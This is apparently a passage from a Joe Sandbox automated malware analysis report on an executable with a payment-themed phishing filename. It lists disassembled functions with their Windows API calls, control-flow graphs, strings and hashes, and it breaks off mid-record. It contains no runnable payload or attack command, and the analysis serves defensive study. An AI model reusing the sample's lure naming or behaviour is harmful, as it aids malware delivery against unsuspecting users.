                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403DC5
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DD9
                                                                                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403DE0
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00403E8E
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403E98
                                                                                                                                                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403EB2
                                                                                                                                                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F03
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00403FA9
                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00403FCA
                                                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FDC
                                                                                                                                                                                                                                          • EnableWindow.USER32(?,?), ref: 00403FF7
                                                                                                                                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040400D
                                                                                                                                                                                                                                          • EnableMenuItem.USER32(00000000), ref: 00404014
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,?,00000000,00000001), ref: 0040402C
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040403F
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(007A1F20,?,007A1F20,00000000), ref: 00404069
                                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,007A1F20), ref: 0040407D
                                                                                                                                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 004041B1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3282139019-0
                                                                                                                                                                                                                                          • Opcode ID: fc3c2fd52c5859f2fd2362f058ebeec97e14ddaa85c60b8da330eda8cc3c5bb0
                                                                                                                                                                                                                                          • Instruction ID: e7c2d8670a20ab778e0eeae1551072eac63d4844406393878d1a707f383ade6f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc3c2fd52c5859f2fd2362f058ebeec97e14ddaa85c60b8da330eda8cc3c5bb0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6C1CDB1504205AFDB206F61ED88E2B3A68EB96705F00853EF651B51F0CB399982DB1E
                                                                                                                                                                                                                                          Function 0040396D Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 244 40396d-403985 call 406639 247 403987-403997 call 4061a6 244->247 248 403999-4039d0 call 40612d 244->248 256 4039f3-403a1c call 403c43 call 405c38 247->256 252 4039d2-4039e3 call 40612d 248->252 253 4039e8-4039ee lstrcatW 248->253 252->253 253->256 262 403a22-403a27 256->262 263 403aae-403ab6 call 405c38 256->263 262->263 264 403a2d-403a55 call 40612d 262->264 269 403ac4-403ae9 LoadImageW 263->269 270 403ab8-403abf call 406281 263->270 264->263 273 403a57-403a5b 264->273 271 403b6a-403b72 call 40140b 269->271 272 403aeb-403b1b RegisterClassW 269->272 270->269 287 403b74-403b77 271->287 288 403b7c-403b87 call 403c43 271->288 275 403b21-403b65 SystemParametersInfoW CreateWindowExW 272->275 276 403c39 272->276 278 403a6d-403a79 lstrlenW 273->278 279 403a5d-403a6a call 405b5d 273->279 275->271 280 403c3b-403c42 276->280 281 403aa1-403aa9 call 405b30 call 40625f 278->281 282 403a7b-403a89 lstrcmpiW 278->282 279->278 281->263 282->281 286 403a8b-403a95 GetFileAttributesW 282->286 290 403a97-403a99 286->290 291 403a9b-403a9c call 405b7c 286->291 287->280 297 403c10-403c18 call 405396 288->297 298 403b8d-403ba7 ShowWindow call 4065c9 288->298 290->281 290->291 291->281 303 403c32-403c34 call 40140b 297->303 304 403c1a-403c20 297->304 305 403bb3-403bc5 GetClassInfoW 298->305 306 403ba9-403bae call 4065c9 298->306 303->276 304->287 309 403c26-403c2d call 40140b 304->309 307 403bc7-403bd7 GetClassInfoW RegisterClassW 305->307 308 403bdd-403c00 DialogBoxParamW call 40140b 305->308 306->305 307->308 314 403c05-403c0e call 4038bd 308->314 309->287 314->280
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00406639: GetModuleHandleA.KERNEL32(?,?,?,004033C2,0000000A), ref: 0040664B
                                                                                                                                                                                                                                            • Part of subcall function 00406639: GetProcAddress.KERNEL32(00000000,?), ref: 00406666
                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\,76943420,"C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe",00000000), ref: 004039EE
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\classrooms,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A6E
                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\classrooms,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 00403A81
                                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(Call), ref: 00403A8C
                                                                                                                                                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\classrooms), ref: 00403AD5
                                                                                                                                                                                                                                            • Part of subcall function 004061A6: wsprintfW.USER32 ref: 004061B3
                                                                                                                                                                                                                                          • RegisterClassW.USER32(007A79C0), ref: 00403B12
                                                                                                                                                                                                                                          • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403B2A
                                                                                                                                                                                                                                          • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B5F
                                                                                                                                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403B95
                                                                                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403BC1
                                                                                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403BCE
                                                                                                                                                                                                                                          • RegisterClassW.USER32(007A79C0), ref: 00403BD7
                                                                                                                                                                                                                                          • DialogBoxParamW.USER32(?,00000000,00403D1B,00000000), ref: 00403BF6
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\classrooms$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                                                                          • API String ID: 1975747703-3030292720
                                                                                                                                                                                                                                          • Opcode ID: 90026218f8455635aced1ea3c9adb74d2a6e6c4d32214fa6dc51bb2c99e1baf3
                                                                                                                                                                                                                                          • Instruction ID: 0f1e86156467dc572bfe90fa2eb59b903a3bd9170c228be251d5c9c569d222eb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90026218f8455635aced1ea3c9adb74d2a6e6c4d32214fa6dc51bb2c99e1baf3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9861C371200604AED720AF669D45F2B3A6CEBC5B49F00853FF941B62E2DB7C69118A2D
                                                                                                                                                                                                                                          Function 00406281 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 449 406281-40628c 450 40628e-40629d 449->450 451 40629f-4062b5 449->451 450->451 452 4062bb-4062c8 451->452 453 4064cd-4064d3 451->453 452->453 454 4062ce-4062d5 452->454 455 4064d9-4064e4 453->455 456 4062da-4062e7 453->456 454->453 458 4064e6-4064ea call 40625f 455->458 459 4064ef-4064f0 455->459 456->455 457 4062ed-4062f9 456->457 460 4064ba 457->460 461 4062ff-40633d 457->461 458->459 465 4064c8-4064cb 460->465 466 4064bc-4064c6 460->466 463 406343-40634e 461->463 464 40645d-406461 461->464 467 406350-406355 463->467 468 406367 463->468 469 406463-406469 464->469 470 406494-406498 464->470 465->453 466->453 467->468 473 406357-40635a 467->473 476 40636e-406375 468->476 474 406479-406485 call 40625f 469->474 475 40646b-406477 call 4061a6 469->475 471 4064a7-4064b8 lstrlenW 470->471 472 40649a-4064a2 call 406281 470->472 471->453 472->471 473->468 478 40635c-40635f 473->478 487 40648a-406490 474->487 475->487 480 406377-406379 476->480 481 40637a-40637c 476->481 478->468 483 406361-406365 478->483 480->481 485 4063b7-4063ba 481->485 486 40637e-40639c call 40612d 481->486 483->476 488 4063ca-4063cd 485->488 489 4063bc-4063c8 GetSystemDirectoryW 485->489 496 4063a1-4063a5 486->496 487->471 491 406492 487->491 494 406438-40643a 488->494 495 4063cf-4063dd GetWindowsDirectoryW 488->495 493 40643c-406440 489->493 492 406455-40645b call 4064f3 491->492 492->471 493->492 500 406442 493->500 494->493 497 4063df-4063e9 494->497 495->494 498 406445-406448 496->498 499 4063ab-4063b2 call 406281 496->499 505 406403-406419 SHGetSpecialFolderLocation 497->505 506 4063eb-4063ee 497->506 498->492 503 40644a-406450 lstrcatW 498->503 499->493 500->498 503->492 509 406434 505->509 510 40641b-406432 SHGetPathFromIDListW CoTaskMemFree 505->510 506->505 508 4063f0-4063f7 506->508 511 4063ff-406401 508->511 509->494 510->493 510->509 511->493 511->505
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063C2
                                                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F00,?,004052FA,007A0F00,00000000), ref: 004063D5
                                                                                                                                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(004052FA,007924D8,00000000,007A0F00,?,004052FA,007A0F00,00000000), ref: 00406411
                                                                                                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(007924D8,Call), ref: 0040641F
                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(007924D8), ref: 0040642A
                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406450
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(Call,00000000,007A0F00,?,004052FA,007A0F00,00000000), ref: 004064A8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                                                                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                          • API String ID: 717251189-1230650788
                                                                                                                                                                                                                                          • Opcode ID: 890eb65aa38ad62bbc062fa9763307f13bf9a84b93246a35c735a8ee9e53aa4d
                                                                                                                                                                                                                                          • Instruction ID: 53892de15873aface2ea8104bec8e4e448d1085f61c5dcff38edd77b46373637
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 890eb65aa38ad62bbc062fa9763307f13bf9a84b93246a35c735a8ee9e53aa4d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA610371A00111AADF249F64DC40ABE37A5BF55324F12813FE547B62D0DB3D89A2CB5D
                                                                                                                                                                                                                                          Function 004052C3 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 512 4052c3-4052d8 513 4052de-4052ef 512->513 514 40538f-405393 512->514 515 4052f1-4052f5 call 406281 513->515 516 4052fa-405306 lstrlenW 513->516 515->516 518 405323-405327 516->518 519 405308-405318 lstrlenW 516->519 521 405336-40533a 518->521 522 405329-405330 SetWindowTextW 518->522 519->514 520 40531a-40531e lstrcatW 519->520 520->518 523 405380-405382 521->523 524 40533c-40537e SendMessageW * 3 521->524 522->521 523->514 525 405384-405387 523->525 524->523 525->514
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(007A0F00,00000000,007924D8,769423A0,?,?,?,?,?,?,?,?,?,0040323B,00000000,?), ref: 004052FB
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(0040323B,007A0F00,00000000,007924D8,769423A0,?,?,?,?,?,?,?,?,?,0040323B,00000000), ref: 0040530B
                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(007A0F00,0040323B,0040323B,007A0F00,00000000,007924D8,769423A0), ref: 0040531E
                                                                                                                                                                                                                                          • SetWindowTextW.USER32(007A0F00,007A0F00), ref: 00405330
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405356
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405370
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040537E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2531174081-0
                                                                                                                                                                                                                                          • Opcode ID: e3da8a659d26e469f7364c86854a8c7d89336f5590f3b6c2a9e79e9323d9dea2
                                                                                                                                                                                                                                          • Instruction ID: 54fc0906511a0d38b77c2dbc449d7618901aa97d03555d0a48212fe36839b6ac
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3da8a659d26e469f7364c86854a8c7d89336f5590f3b6c2a9e79e9323d9dea2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9218C71900618BACF11AFA6DD84EDFBF74EF85350F10807AF905B22A0C7794A40CBA8
                                                                                                                                                                                                                                          Function 004065C9 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 526 4065c9-4065e9 GetSystemDirectoryW 527 4065eb 526->527 528 4065ed-4065ef 526->528 527->528 529 406600-406602 528->529 530 4065f1-4065fa 528->530 532 406603-406636 wsprintfW LoadLibraryExW 529->532 530->529 531 4065fc-4065fe 530->531 531->532
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065E0
                                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 0040661B
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,?), ref: 0040662F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                                                          • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                                                                          • API String ID: 2200240437-1946221925
                                                                                                                                                                                                                                          • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                                                                                                                          • Instruction ID: 20a568d0c0fc1602bd6380e0cb5a56c4d8b7367864d21650c92abf75bc562668
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5F0F670500219AADB14AB64ED0DF9B366CAB00304F10447AA646F11D1EBB8DA24CBA8
                                                                                                                                                                                                                                          Function 004030FA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 533 4030fa-403111 534 403113 533->534 535 40311a-403123 533->535 534->535 536 403125 535->536 537 40312c-403131 535->537 536->537 538 403141-40314e call 4032f2 537->538 539 403133-40313c call 403308 537->539 543 4032e0 538->543 544 403154-403158 538->544 539->538 545 4032e2-4032e3 543->545 546 40328b-40328d 544->546 547 40315e-403184 GetTickCount 544->547 550 4032eb-4032ef 545->550 548 4032cd-4032d0 546->548 549 40328f-403292 546->549 551 4032e8 547->551 552 40318a-403192 547->552 553 4032d2 548->553 554 4032d5-4032de call 4032f2 548->554 549->551 555 403294 549->555 551->550 556 403194 552->556 557 403197-4031a5 call 4032f2 552->557 553->554 554->543 565 4032e5 554->565 559 403297-40329d 555->559 556->557 557->543 567 4031ab-4031b4 557->567 562 4032a1-4032af call 4032f2 559->562 563 40329f 559->563 562->543 571 4032b1-4032bd call 405e03 562->571 563->562 565->551 568 4031ba-4031da call 40679a 567->568 575 4031e0-4031f3 GetTickCount 568->575 576 403283-403285 568->576 577 403287-403289 571->577 578 4032bf-4032c9 571->578 579 4031f5-4031fd 575->579 580 40323e-403240 575->580 576->545 577->545 578->559 581 4032cb 578->581 582 403205-403236 MulDiv wsprintfW call 4052c3 579->582 583 4031ff-403203 579->583 584 403242-403246 580->584 585 403277-40327b 580->585 581->551 591 40323b 582->591 583->580 583->582 588 403248-40324f call 405e03 584->588 589 40325d-403268 584->589 585->552 586 403281 585->586 586->551 594 403254-403256 588->594 590 40326b-40326f 589->590 590->568 593 403275 590->593 591->580 593->551 594->577 595 403258-40325b 594->595 595->590
                                                                                                                                                                                                                                          APIs
